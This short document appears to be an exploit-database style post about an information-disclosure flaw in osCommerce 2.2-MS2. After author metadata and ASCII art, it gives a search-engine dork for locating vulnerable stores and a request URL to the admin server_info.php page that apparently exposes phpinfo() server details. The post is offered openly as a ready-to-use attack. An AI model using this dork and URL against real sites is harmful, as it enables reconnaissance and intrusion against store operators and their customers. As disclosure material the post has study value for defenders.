# Exploit Title: osCommerce 2.2-MS2 phpinfo() disclosure vulnerability
# Date: 21 June 2010
# Author: Neo-Gabriel
# Download: http://www.oscommerce.com/solutions/downloads
# Version: 2.2-MS2
# Tested on: Windows 95
             .__       .___.__                       _____      _____  .__  .__         .__     
  __________ |  |    __| _/|__| ___________    _____/ ____\    /  _  \ |  | |  | _____  |  |__  
 /  ___/  _ \|  |   / __ | |  |/ __ \_  __ \  /  _ \   __\    /  /_\  \|  | |  | \__  \ |  |  \ 
 \___ (  <_> )  |__/ /_/ | |  \  ___/|  | \/ (  <_> )  |     /    |    \  |_|  |__/ __ \|   Y  \
/____  >____/|____/\____ | |__|\___  >__|     \____/|__|    /\____|__  /____/____(____  /___|  /
     \/                 \/         \/                       \/       \/               \/     \/ 

dork: intitle:osCommerce 2.2-MS2
expl: 127.0.31.337/admin/server_info.php?osCAdminID=1

--------------------
voila..! :D